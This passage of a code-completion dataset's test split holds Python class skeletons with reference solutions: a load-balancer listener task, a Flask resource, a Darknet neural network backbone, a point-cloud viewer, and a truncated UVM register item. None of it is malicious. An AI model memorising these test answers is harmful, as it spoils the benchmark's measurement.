"snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ListenersUpdate:\n \"\"\"Task to update amphora with all specified listeners' configurations.\"\"\"\n\n def execute(self, loadbalancer, listeners, vthunder):\n \"\"\"Execute updates per listener for an amphora.\"\"\"\n for listener in listeners:\n listener.load_balancer = loadbalancer\n try:\n c = self.client_factory(vthunder)\n name = loadbalancer.id + '_' + str(listener.protocol_port)\n if listener.protocol == 'TERMINATED_HTTPS':\n listener.protocol = 'HTTPS'\n out = c.slb.virtual_server.vport.update(loadbalancer.id, name, listener.protocol, listener.protocol_port, listener.default_pool_id)\n LOG.info('Listener created successfully.')\n except Exception as e:\n print(str(e))\n LOG.info('Error occurred')\n\n def revert(self, loadbalancer, *args, **kwargs):\n \"\"\"Handle failed listeners updates.\"\"\"\n LOG.warning('Reverting listeners updates.')\n for listener in loadbalancer.listeners:\n self.task_utils.mark_listener_prov_status_error(listener.id)\n return None\n", "source": "the_stack_v2_python_sparse", "source_path": "a10_octavia/controller/worker/tasks/handler_virtual_port.py", "source_repo": "richuc/a10-octavia", "split": "test", "star_events_count": 0} {"blob_id": "da4db204866d56b10b1ded6f77a52e4771a69d2a", "bodies": ["freigabe_info = request.json\ninserted_freigaben = []\nfor freigabe in freigabe_info:\n inserted_freigabe = Freigabe.create(freigabe_dict=freigabe)\n inserted_freigaben.append(inserted_freigabe)\nreturn inserted_freigaben", "freigabe_info = request.json\nfreigabe_info['last_updated'] = datetime.utcnow()\nfreigabe = Freigabe.find_by_id(freigabe_info['id'])\nif freigabe is None:\n abort(400, message='error.freigabe_bearbeiten')\nfreigabe.update(data=freigabe_info)\nreturn freigabe", "query = query_freigabe_parser.parse_args()\nclean_query = {k: v for k, v in query.items() if v is not None}\ndb_query = db.session.query(Freigabe)\nfor key in clean_query:\n db_query = db_query.filter(getattr(Freigabe, key) == clean_query[key])\nresults = db_query.all()\nreturn results"], "bodies_text": "<|body_start_0|>\n freigabe_info = request.json\n inserted_freigaben = []\n for freigabe in freigabe_info:\n inserted_freigabe = Freigabe.create(freigabe_dict=freigabe)\n inserted_freigaben.append(inserted_freigabe)\n return inserted_freigaben\n<|end_body_0|>\n\n<|body_start_1|>\n freigabe_info = request.json\n freigabe_info['last_updated'] = datetime.utcnow()\n freigabe = Freigabe.find_by_id(freigabe_info['id'])\n if freigabe is None:\n abort(400, message='error.freigabe_bearbeiten')\n freigabe.update(data=freigabe_info)\n return freigabe\n<|end_body_1|>\n\n<|body_start_2|>\n query = query_freigabe_parser.parse_args()\n clean_query = {k: v for k, v in query.items() if v is not None}\n db_query = db.session.query(Freigabe)\n for key in clean_query:\n db_query = db_query.filter(getattr(Freigabe, key) == clean_query[key])\n results = db_query.all()\n return results\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Freigaben", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Freigaben:\n\n def post(self):\n \"\"\"Freigabeliste wird in die Datenbank hinzugefügt\"\"\"\n <|body_0|>\n\n def put(self):\n \"\"\"Freigabe bearbeiten\"\"\"\n <|body_1|>\n\n def get(self):\n \"\"\"Freigabe anzeigen\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n freigabe_info = request.json\n inserted_freigaben = []\n for freigabe in freigabe_info:\n inserted_freigabe = Freigabe.create(freigabe_dict=freigabe)\n inserted_freigaben.append(inserted_freigabe)\n return inserted_freigaben\n<|end_body_0|>\n\n<|body_start_1|>\n freigabe_info = request.json\n freigabe_info['last_updated'] = datetime.utcnow()\n freigabe = Freigabe.find_by_id(freigabe_info['id'])\n if freigabe is None:\n abort(400, message='error.freigabe_bearbeiten')\n freigabe.update(data=freigabe_info)\n return freigabe\n<|end_body_1|>\n\n<|body_start_2|>\n query = query_freigabe_parser.parse_args()\n clean_query = {k: v for k, v in query.items() if v is not None}\n db_query = db.session.query(Freigabe)\n for key in clean_query:\n db_query = db_query.filter(getattr(Freigabe, key) == clean_query[key])\n results = db_query.all()\n return results\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000109", "length_bytes": 4017, "license_type": "no_license", "methods": [{"docstring": "Freigabeliste wird in die Datenbank hinzugefügt", "name": "post", "signature": "def post(self)"}, {"docstring": "Freigabe bearbeiten", "name": "put", "signature": "def put(self)"}, {"docstring": "Freigabe anzeigen", "name": "get", "signature": "def get(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_004264", "prompt": "Implement the Python class `Freigaben` described below.\n\nClass description:\nImplement the Freigaben class.\n\nMethod signatures and docstrings:\n- def post(self): Freigabeliste wird in die Datenbank hinzugefügt\n- def put(self): Freigabe bearbeiten\n- def get(self): Freigabe anzeigen", "prompted_full_text": "Implement the Python class `Freigaben` described below.\n\nClass description:\nImplement the Freigaben class.\n\nMethod signatures and docstrings:\n- def post(self): Freigabeliste wird in die Datenbank hinzugefügt\n- def put(self): Freigabe bearbeiten\n- def get(self): Freigabe anzeigen\n\n<|skeleton|>\nclass Freigaben:\n\n def post(self):\n \"\"\"Freigabeliste wird in die Datenbank hinzugefügt\"\"\"\n <|body_0|>\n\n def put(self):\n \"\"\"Freigabe bearbeiten\"\"\"\n <|body_1|>\n\n def get(self):\n \"\"\"Freigabe anzeigen\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n freigabe_info = request.json\n inserted_freigaben = []\n for freigabe in freigabe_info:\n inserted_freigabe = Freigabe.create(freigabe_dict=freigabe)\n inserted_freigaben.append(inserted_freigabe)\n return inserted_freigaben\n<|end_body_0|>\n\n<|body_start_1|>\n freigabe_info = request.json\n freigabe_info['last_updated'] = datetime.utcnow()\n freigabe = Freigabe.find_by_id(freigabe_info['id'])\n if freigabe is None:\n abort(400, message='error.freigabe_bearbeiten')\n freigabe.update(data=freigabe_info)\n return freigabe\n<|end_body_1|>\n\n<|body_start_2|>\n query = query_freigabe_parser.parse_args()\n clean_query = {k: v for k, v in query.items() if v is not None}\n db_query = db.session.query(Freigabe)\n for key in clean_query:\n db_query = db_query.filter(getattr(Freigabe, key) == clean_query[key])\n results = db_query.all()\n return results\n<|end_body_2|>\n", "revision_id": "8f1f0f9bb2a060aa5c32be320a6d2c955f442053", "skeleton": "<|skeleton|>\nclass Freigaben:\n\n def post(self):\n \"\"\"Freigabeliste wird in die Datenbank hinzugefügt\"\"\"\n <|body_0|>\n\n def put(self):\n \"\"\"Freigabe bearbeiten\"\"\"\n <|body_1|>\n\n def get(self):\n \"\"\"Freigabe anzeigen\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Freigaben:\n def post(self):\n \"\"\"Freigabeliste wird in die Datenbank hinzugefügt\"\"\"\n freigabe_info = request.json\n inserted_freigaben = []\n for freigabe in freigabe_info:\n inserted_freigabe = Freigabe.create(freigabe_dict=freigabe)\n inserted_freigaben.append(inserted_freigabe)\n return inserted_freigaben\n\n def put(self):\n \"\"\"Freigabe bearbeiten\"\"\"\n freigabe_info = request.json\n freigabe_info['last_updated'] = datetime.utcnow()\n freigabe = Freigabe.find_by_id(freigabe_info['id'])\n if freigabe is None:\n abort(400, message='error.freigabe_bearbeiten')\n freigabe.update(data=freigabe_info)\n return freigabe\n\n def get(self):\n \"\"\"Freigabe anzeigen\"\"\"\n query = query_freigabe_parser.parse_args()\n clean_query = {k: v for k, v in query.items() if v is not None}\n db_query = db.session.query(Freigabe)\n for key in clean_query:\n db_query = db_query.filter(getattr(Freigabe, key) == clean_query[key])\n results = db_query.all()\n return results\n", "source": "the_stack_v2_python_sparse", "source_path": "app/api/freigaben.py", "source_repo": "hammadi3/freig", "split": "test", "star_events_count": 0} {"blob_id": "5f45935372d3cb33d0e21d88a390bcc90e986189", "bodies": ["super(Darknet, self).__init__()\nself.in_channels = in_ch\nself.batch_norm = batch_norm\nself.filters = filters\nself.stride_out_1 = 32\nself.stride_out_2 = 16\nself.stride_out_3 = 8\nindex = 0\nself.first_index = 0\nself.conv0 = DarknetConvBlock(self.in_channels, self.filters, kernel_size=3, stride=1, padding=1, batch_norm=self.batch_norm, index=index)\nindex += 1\nself.conv1 = DarknetBlock(self.filters, self.filters * 2, batch_norm=self.batch_norm, rep=1, index=index)\nindex = self.conv1.index_out + 1\nself.conv2 = DarknetBlock(self.filters * 2, self.filters * 4, batch_norm=self.batch_norm, rep=2, index=index)\nindex = self.conv2.index_out + 1\nself.conv3 = DarknetBlock(self.filters * 4, self.filters * 8, batch_norm=self.batch_norm, rep=8, index=index)\nindex = self.conv3.index_out + 1\nself.conv4 = DarknetBlock(self.filters * 8, self.filters * 16, batch_norm=self.batch_norm, rep=8, index=index)\nindex = self.conv4.index_out + 1\nself.conv5 = DarknetBlock(self.filters * 16, self.filters * 32, batch_norm=self.batch_norm, rep=4, index=index)\nindex = self.conv5.index_out + 1\nself.conv_low = DarknetLoopBlock(self.filters * 32, self.filters * 16, batch_norm=self.batch_norm, rep=5, index=index)\nindex = self.conv_low.index_out + 1\nself.conv_up1 = DarknetUpsampling(self.filters * 16, self.filters * 8, res_ch=self.filters * 16, batch_norm=self.batch_norm, rep=5, index=index)\nindex = self.conv_up1.index_out + 1\nself.conv_up2 = DarknetUpsampling(self.filters * 8, self.filters * 4, res_ch=self.filters * 8, batch_norm=self.batch_norm, rep=5, index=index)\nindex = self.conv_up2.index_out + 1\nself.last_index = index", "x0 = self.conv0(x)\nx1 = self.conv1(x0)\nx2 = self.conv2(x1)\nx3 = self.conv3(x2)\nx4 = self.conv4(x3)\nx5 = self.conv5(x4)\nx_out1 = self.conv_low(x5)\nx_out2 = self.conv_up1(x_out1, x_res=x4)\nx_out3 = self.conv_up2(x_out2, x_res=x3)\nreturn (x_out1, x_out2, x_out3)"], "bodies_text": "<|body_start_0|>\n super(Darknet, self).__init__()\n self.in_channels = in_ch\n self.batch_norm = batch_norm\n self.filters = filters\n self.stride_out_1 = 32\n self.stride_out_2 = 16\n self.stride_out_3 = 8\n index = 0\n self.first_index = 0\n self.conv0 = DarknetConvBlock(self.in_channels, self.filters, kernel_size=3, stride=1, padding=1, batch_norm=self.batch_norm, index=index)\n index += 1\n self.conv1 = DarknetBlock(self.filters, self.filters * 2, batch_norm=self.batch_norm, rep=1, index=index)\n index = self.conv1.index_out + 1\n self.conv2 = DarknetBlock(self.filters * 2, self.filters * 4, batch_norm=self.batch_norm, rep=2, index=index)\n index = self.conv2.index_out + 1\n self.conv3 = DarknetBlock(self.filters * 4, self.filters * 8, batch_norm=self.batch_norm, rep=8, index=index)\n index = self.conv3.index_out + 1\n self.conv4 = DarknetBlock(self.filters * 8, self.filters * 16, batch_norm=self.batch_norm, rep=8, index=index)\n index = self.conv4.index_out + 1\n self.conv5 = DarknetBlock(self.filters * 16, self.filters * 32, batch_norm=self.batch_norm, rep=4, index=index)\n index = self.conv5.index_out + 1\n self.conv_low = DarknetLoopBlock(self.filters * 32, self.filters * 16, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_low.index_out + 1\n self.conv_up1 = DarknetUpsampling(self.filters * 16, self.filters * 8, res_ch=self.filters * 16, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_up1.index_out + 1\n self.conv_up2 = DarknetUpsampling(self.filters * 8, self.filters * 4, res_ch=self.filters * 8, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_up2.index_out + 1\n self.last_index = index\n<|end_body_0|>\n\n<|body_start_1|>\n x0 = self.conv0(x)\n x1 = self.conv1(x0)\n x2 = self.conv2(x1)\n x3 = self.conv3(x2)\n x4 = self.conv4(x3)\n x5 = self.conv5(x4)\n x_out1 = self.conv_low(x5)\n x_out2 = self.conv_up1(x_out1, x_res=x4)\n x_out3 = self.conv_up2(x_out2, x_res=x3)\n return (x_out1, x_out2, x_out3)\n<|end_body_1|>\n", "class_docstring": "Darknet body class", "class_name": "Darknet", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Darknet:\n \"\"\"Darknet body class\"\"\"\n\n def __init__(self, in_ch, filters=32, batch_norm=True):\n \"\"\"Constructor\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Foward method\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Darknet, self).__init__()\n self.in_channels = in_ch\n self.batch_norm = batch_norm\n self.filters = filters\n self.stride_out_1 = 32\n self.stride_out_2 = 16\n self.stride_out_3 = 8\n index = 0\n self.first_index = 0\n self.conv0 = DarknetConvBlock(self.in_channels, self.filters, kernel_size=3, stride=1, padding=1, batch_norm=self.batch_norm, index=index)\n index += 1\n self.conv1 = DarknetBlock(self.filters, self.filters * 2, batch_norm=self.batch_norm, rep=1, index=index)\n index = self.conv1.index_out + 1\n self.conv2 = DarknetBlock(self.filters * 2, self.filters * 4, batch_norm=self.batch_norm, rep=2, index=index)\n index = self.conv2.index_out + 1\n self.conv3 = DarknetBlock(self.filters * 4, self.filters * 8, batch_norm=self.batch_norm, rep=8, index=index)\n index = self.conv3.index_out + 1\n self.conv4 = DarknetBlock(self.filters * 8, self.filters * 16, batch_norm=self.batch_norm, rep=8, index=index)\n index = self.conv4.index_out + 1\n self.conv5 = DarknetBlock(self.filters * 16, self.filters * 32, batch_norm=self.batch_norm, rep=4, index=index)\n index = self.conv5.index_out + 1\n self.conv_low = DarknetLoopBlock(self.filters * 32, self.filters * 16, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_low.index_out + 1\n self.conv_up1 = DarknetUpsampling(self.filters * 16, self.filters * 8, res_ch=self.filters * 16, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_up1.index_out + 1\n self.conv_up2 = DarknetUpsampling(self.filters * 8, self.filters * 4, res_ch=self.filters * 8, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_up2.index_out + 1\n self.last_index = index\n<|end_body_0|>\n\n<|body_start_1|>\n x0 = self.conv0(x)\n x1 = self.conv1(x0)\n x2 = self.conv2(x1)\n x3 = self.conv3(x2)\n x4 = self.conv4(x3)\n x5 = self.conv5(x4)\n x_out1 = self.conv_low(x5)\n x_out2 = self.conv_up1(x_out1, x_res=x4)\n x_out3 = self.conv_up2(x_out2, x_res=x3)\n return (x_out1, x_out2, x_out3)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000110", "length_bytes": 28014, "license_type": "no_license", "methods": [{"docstring": "Constructor", "name": "__init__", "signature": "def __init__(self, in_ch, filters=32, batch_norm=True)"}, {"docstring": "Foward method", "name": "forward", "signature": "def forward(self, x)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004288", "prompt": "Implement the Python class `Darknet` described below.\n\nClass description:\nDarknet body class\n\nMethod signatures and docstrings:\n- def __init__(self, in_ch, filters=32, batch_norm=True): Constructor\n- def forward(self, x): Foward method", "prompted_full_text": "Implement the Python class `Darknet` described below.\n\nClass description:\nDarknet body class\n\nMethod signatures and docstrings:\n- def __init__(self, in_ch, filters=32, batch_norm=True): Constructor\n- def forward(self, x): Foward method\n\n<|skeleton|>\nclass Darknet:\n \"\"\"Darknet body class\"\"\"\n\n def __init__(self, in_ch, filters=32, batch_norm=True):\n \"\"\"Constructor\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Foward method\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Darknet, self).__init__()\n self.in_channels = in_ch\n self.batch_norm = batch_norm\n self.filters = filters\n self.stride_out_1 = 32\n self.stride_out_2 = 16\n self.stride_out_3 = 8\n index = 0\n self.first_index = 0\n self.conv0 = DarknetConvBlock(self.in_channels, self.filters, kernel_size=3, stride=1, padding=1, batch_norm=self.batch_norm, index=index)\n index += 1\n self.conv1 = DarknetBlock(self.filters, self.filters * 2, batch_norm=self.batch_norm, rep=1, index=index)\n index = self.conv1.index_out + 1\n self.conv2 = DarknetBlock(self.filters * 2, self.filters * 4, batch_norm=self.batch_norm, rep=2, index=index)\n index = self.conv2.index_out + 1\n self.conv3 = DarknetBlock(self.filters * 4, self.filters * 8, batch_norm=self.batch_norm, rep=8, index=index)\n index = self.conv3.index_out + 1\n self.conv4 = DarknetBlock(self.filters * 8, self.filters * 16, batch_norm=self.batch_norm, rep=8, index=index)\n index = self.conv4.index_out + 1\n self.conv5 = DarknetBlock(self.filters * 16, self.filters * 32, batch_norm=self.batch_norm, rep=4, index=index)\n index = self.conv5.index_out + 1\n self.conv_low = DarknetLoopBlock(self.filters * 32, self.filters * 16, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_low.index_out + 1\n self.conv_up1 = DarknetUpsampling(self.filters * 16, self.filters * 8, res_ch=self.filters * 16, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_up1.index_out + 1\n self.conv_up2 = DarknetUpsampling(self.filters * 8, self.filters * 4, res_ch=self.filters * 8, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_up2.index_out + 1\n self.last_index = index\n<|end_body_0|>\n\n<|body_start_1|>\n x0 = self.conv0(x)\n x1 = self.conv1(x0)\n x2 = self.conv2(x1)\n x3 = self.conv3(x2)\n x4 = self.conv4(x3)\n x5 = self.conv5(x4)\n x_out1 = self.conv_low(x5)\n x_out2 = self.conv_up1(x_out1, x_res=x4)\n x_out3 = self.conv_up2(x_out2, x_res=x3)\n return (x_out1, x_out2, x_out3)\n<|end_body_1|>\n", "revision_id": "69edb5ecd569395086cf610df9c8aa345284259a", "skeleton": "<|skeleton|>\nclass Darknet:\n \"\"\"Darknet body class\"\"\"\n\n def __init__(self, in_ch, filters=32, batch_norm=True):\n \"\"\"Constructor\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Foward method\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Darknet:\n \"\"\"Darknet body class\"\"\"\n\n def __init__(self, in_ch, filters=32, batch_norm=True):\n \"\"\"Constructor\"\"\"\n super(Darknet, self).__init__()\n self.in_channels = in_ch\n self.batch_norm = batch_norm\n self.filters = filters\n self.stride_out_1 = 32\n self.stride_out_2 = 16\n self.stride_out_3 = 8\n index = 0\n self.first_index = 0\n self.conv0 = DarknetConvBlock(self.in_channels, self.filters, kernel_size=3, stride=1, padding=1, batch_norm=self.batch_norm, index=index)\n index += 1\n self.conv1 = DarknetBlock(self.filters, self.filters * 2, batch_norm=self.batch_norm, rep=1, index=index)\n index = self.conv1.index_out + 1\n self.conv2 = DarknetBlock(self.filters * 2, self.filters * 4, batch_norm=self.batch_norm, rep=2, index=index)\n index = self.conv2.index_out + 1\n self.conv3 = DarknetBlock(self.filters * 4, self.filters * 8, batch_norm=self.batch_norm, rep=8, index=index)\n index = self.conv3.index_out + 1\n self.conv4 = DarknetBlock(self.filters * 8, self.filters * 16, batch_norm=self.batch_norm, rep=8, index=index)\n index = self.conv4.index_out + 1\n self.conv5 = DarknetBlock(self.filters * 16, self.filters * 32, batch_norm=self.batch_norm, rep=4, index=index)\n index = self.conv5.index_out + 1\n self.conv_low = DarknetLoopBlock(self.filters * 32, self.filters * 16, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_low.index_out + 1\n self.conv_up1 = DarknetUpsampling(self.filters * 16, self.filters * 8, res_ch=self.filters * 16, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_up1.index_out + 1\n self.conv_up2 = DarknetUpsampling(self.filters * 8, self.filters * 4, res_ch=self.filters * 8, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_up2.index_out + 1\n self.last_index = index\n\n def forward(self, x):\n \"\"\"Foward method\"\"\"\n x0 = self.conv0(x)\n x1 = self.conv1(x0)\n x2 = self.conv2(x1)\n x3 = self.conv3(x2)\n x4 = self.conv4(x3)\n x5 = self.conv5(x4)\n x_out1 = self.conv_low(x5)\n x_out2 = self.conv_up1(x_out1, x_res=x4)\n x_out3 = self.conv_up2(x_out2, x_res=x3)\n return (x_out1, x_out2, x_out3)\n", "source": "the_stack_v2_python_sparse", "source_path": "python/models/modules.py", "source_repo": "dswanderley/detntorch", "split": "test", "star_events_count": 2} {"blob_id": "90acc4c6f64af9f0513417fca149d619450bc5c7", "bodies": ["self.name = name\nself.pos = []\nself.Pn = []\nself.flux = []\nself.pointCloud = []\nself.readpil3d()", "res = np.loadtxt(self.name, delimiter=' ')\nself.pos = res[:, 0:3]\nself.Pn = res[:, 3:4]\nself.flux = res[:, -1]", "self.pointCloud = VtkPointCloud()\nfor k in range(np.size(self.pos, 0)):\n self.pointCloud.addPoint(self.pos[k, :])\nrenderer = vtk.vtkRenderer()\nrenderer.AddActor(self.pointCloud.vtkActor)\nrenderer.SetBackground(0.2, 0.3, 0.4)\nrenderer.SetBackground(0.0, 0.0, 0.0)\nrenderer.ResetCamera()\nrenderWindow = vtk.vtkRenderWindow()\nrenderWindow.AddRenderer(renderer)\nrenderWindowInteractor = vtk.vtkRenderWindowInteractor()\nrenderWindowInteractor.SetRenderWindow(renderWindow)\nrenderWindow.Render()\nrenderWindow.SetWindowName('XYZ Data Viewer: ')\nrenderWindowInteractor.Start()"], "bodies_text": "<|body_start_0|>\n self.name = name\n self.pos = []\n self.Pn = []\n self.flux = []\n self.pointCloud = []\n self.readpil3d()\n<|end_body_0|>\n\n<|body_start_1|>\n res = np.loadtxt(self.name, delimiter=' ')\n self.pos = res[:, 0:3]\n self.Pn = res[:, 3:4]\n self.flux = res[:, -1]\n<|end_body_1|>\n\n<|body_start_2|>\n self.pointCloud = VtkPointCloud()\n for k in range(np.size(self.pos, 0)):\n self.pointCloud.addPoint(self.pos[k, :])\n renderer = vtk.vtkRenderer()\n renderer.AddActor(self.pointCloud.vtkActor)\n renderer.SetBackground(0.2, 0.3, 0.4)\n renderer.SetBackground(0.0, 0.0, 0.0)\n renderer.ResetCamera()\n renderWindow = vtk.vtkRenderWindow()\n renderWindow.AddRenderer(renderer)\n renderWindowInteractor = vtk.vtkRenderWindowInteractor()\n renderWindowInteractor.SetRenderWindow(renderWindow)\n renderWindow.Render()\n renderWindow.SetWindowName('XYZ Data Viewer: ')\n renderWindowInteractor.Start()\n<|end_body_2|>\n", "class_docstring": "Class representing a PILAGER3D output file.", "class_name": "PIL3D", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PIL3D:\n \"\"\"Class representing a PILAGER3D output file.\"\"\"\n\n def __init__(self, name):\n \"\"\"Method to initialize class.\"\"\"\n <|body_0|>\n\n def readpil3d(self):\n \"\"\"Method to read in the pil3d txt file.\"\"\"\n <|body_1|>\n\n def make_point_cloud(self):\n \"\"\"Method to plot the point cloud.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.name = name\n self.pos = []\n self.Pn = []\n self.flux = []\n self.pointCloud = []\n self.readpil3d()\n<|end_body_0|>\n\n<|body_start_1|>\n res = np.loadtxt(self.name, delimiter=' ')\n self.pos = res[:, 0:3]\n self.Pn = res[:, 3:4]\n self.flux = res[:, -1]\n<|end_body_1|>\n\n<|body_start_2|>\n self.pointCloud = VtkPointCloud()\n for k in range(np.size(self.pos, 0)):\n self.pointCloud.addPoint(self.pos[k, :])\n renderer = vtk.vtkRenderer()\n renderer.AddActor(self.pointCloud.vtkActor)\n renderer.SetBackground(0.2, 0.3, 0.4)\n renderer.SetBackground(0.0, 0.0, 0.0)\n renderer.ResetCamera()\n renderWindow = vtk.vtkRenderWindow()\n renderWindow.AddRenderer(renderer)\n renderWindowInteractor = vtk.vtkRenderWindowInteractor()\n renderWindowInteractor.SetRenderWindow(renderWindow)\n renderWindow.Render()\n renderWindow.SetWindowName('XYZ Data Viewer: ')\n renderWindowInteractor.Start()\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000111", "length_bytes": 3136, "license_type": "no_license", "methods": [{"docstring": "Method to initialize class.", "name": "__init__", "signature": "def __init__(self, name)"}, {"docstring": "Method to read in the pil3d txt file.", "name": "readpil3d", "signature": "def readpil3d(self)"}, {"docstring": "Method to plot the point cloud.", "name": "make_point_cloud", "signature": "def make_point_cloud(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_001929", "prompt": "Implement the Python class `PIL3D` described below.\n\nClass description:\nClass representing a PILAGER3D output file.\n\nMethod signatures and docstrings:\n- def __init__(self, name): Method to initialize class.\n- def readpil3d(self): Method to read in the pil3d txt file.\n- def make_point_cloud(self): Method to plot the point cloud.", "prompted_full_text": "Implement the Python class `PIL3D` described below.\n\nClass description:\nClass representing a PILAGER3D output file.\n\nMethod signatures and docstrings:\n- def __init__(self, name): Method to initialize class.\n- def readpil3d(self): Method to read in the pil3d txt file.\n- def make_point_cloud(self): Method to plot the point cloud.\n\n<|skeleton|>\nclass PIL3D:\n \"\"\"Class representing a PILAGER3D output file.\"\"\"\n\n def __init__(self, name):\n \"\"\"Method to initialize class.\"\"\"\n <|body_0|>\n\n def readpil3d(self):\n \"\"\"Method to read in the pil3d txt file.\"\"\"\n <|body_1|>\n\n def make_point_cloud(self):\n \"\"\"Method to plot the point cloud.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.name = name\n self.pos = []\n self.Pn = []\n self.flux = []\n self.pointCloud = []\n self.readpil3d()\n<|end_body_0|>\n\n<|body_start_1|>\n res = np.loadtxt(self.name, delimiter=' ')\n self.pos = res[:, 0:3]\n self.Pn = res[:, 3:4]\n self.flux = res[:, -1]\n<|end_body_1|>\n\n<|body_start_2|>\n self.pointCloud = VtkPointCloud()\n for k in range(np.size(self.pos, 0)):\n self.pointCloud.addPoint(self.pos[k, :])\n renderer = vtk.vtkRenderer()\n renderer.AddActor(self.pointCloud.vtkActor)\n renderer.SetBackground(0.2, 0.3, 0.4)\n renderer.SetBackground(0.0, 0.0, 0.0)\n renderer.ResetCamera()\n renderWindow = vtk.vtkRenderWindow()\n renderWindow.AddRenderer(renderer)\n renderWindowInteractor = vtk.vtkRenderWindowInteractor()\n renderWindowInteractor.SetRenderWindow(renderWindow)\n renderWindow.Render()\n renderWindow.SetWindowName('XYZ Data Viewer: ')\n renderWindowInteractor.Start()\n<|end_body_2|>\n", "revision_id": "6b37842203ff4318a48dbf0258cbe2b253436e7d", "skeleton": "<|skeleton|>\nclass PIL3D:\n \"\"\"Class representing a PILAGER3D output file.\"\"\"\n\n def __init__(self, name):\n \"\"\"Method to initialize class.\"\"\"\n <|body_0|>\n\n def readpil3d(self):\n \"\"\"Method to read in the pil3d txt file.\"\"\"\n <|body_1|>\n\n def make_point_cloud(self):\n \"\"\"Method to plot the point cloud.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PIL3D:\n \"\"\"Class representing a PILAGER3D output file.\"\"\"\n\n def __init__(self, name):\n \"\"\"Method to initialize class.\"\"\"\n self.name = name\n self.pos = []\n self.Pn = []\n self.flux = []\n self.pointCloud = []\n self.readpil3d()\n\n def readpil3d(self):\n \"\"\"Method to read in the pil3d txt file.\"\"\"\n res = np.loadtxt(self.name, delimiter=' ')\n self.pos = res[:, 0:3]\n self.Pn = res[:, 3:4]\n self.flux = res[:, -1]\n\n def make_point_cloud(self):\n \"\"\"Method to plot the point cloud.\"\"\"\n self.pointCloud = VtkPointCloud()\n for k in range(np.size(self.pos, 0)):\n self.pointCloud.addPoint(self.pos[k, :])\n renderer = vtk.vtkRenderer()\n renderer.AddActor(self.pointCloud.vtkActor)\n renderer.SetBackground(0.2, 0.3, 0.4)\n renderer.SetBackground(0.0, 0.0, 0.0)\n renderer.ResetCamera()\n renderWindow = vtk.vtkRenderWindow()\n renderWindow.AddRenderer(renderer)\n renderWindowInteractor = vtk.vtkRenderWindowInteractor()\n renderWindowInteractor.SetRenderWindow(renderWindow)\n renderWindow.Render()\n renderWindow.SetWindowName('XYZ Data Viewer: ')\n renderWindowInteractor.Start()\n", "source": "the_stack_v2_python_sparse", "source_path": "plume/pil3d.py", "source_repo": "tslowery78/PyLnD", "split": "test", "star_events_count": 0} {"blob_id": "46fbc83852d00ff2a80b2b00ffcb099e9e96064f", "bodies": ["UVMSequenceItem.__init__(self, name)\nself.value: List[int] = [0]\nself.path = UVM_FRONTDOOR\nself.status = 0\nself.fname = ''\nself.lineno = 0\nself.bd_kind = ''\nself.prior = -1\nself.extension = None\nself.parent = None\nself.offset = 0\nself.kind = UVM_READ\nself.element = None\nself.element_kind = -1\nself.map = None\nself.local_map = None", "value_s = ''\nele_name = 'null'\nif self.element is not None:\n ele_name = self.element.get_full_name()\nkind_str = UVM_ACCESS_NAMES[self.kind]\nelement_kind_str = UVM_ELEMENT_KIND_NAMES[self.element_kind]\ns = 'kind=' + kind_str + ' ele_kind=' + element_kind_str + ' ele_name=' + ele_name\nif len(self.value) > 1 and uvm_report_enabled(UVM_HIGH, UVM_INFO, 'RegModel'):\n value_s = \"'{\"\n for i in range(len(self.value)):\n value_s = value_s + sv.sformatf('%0h,', self.value[i])\n value_s = value_s[:-1] + '}'\nelse:\n value_s = sv.sformatf('%0h', self.value[0])\ns = s + ' value=' + value_s\nif self.element_kind == UVM_MEM:\n s = s + sv.sformatf(' offset=%0h', self.offset)\nmap_name = 'null'\nif self.map is not None:\n map_name = self.map.get_full_name()\ns = s + ' map=' + map_name + ' path=' + str(self.path)\ns = s + ' status=' + str(self.status)\nreturn s", "if rhs is None:\n uvm_fatal('REG/NULL', 'do_copy: rhs argument is 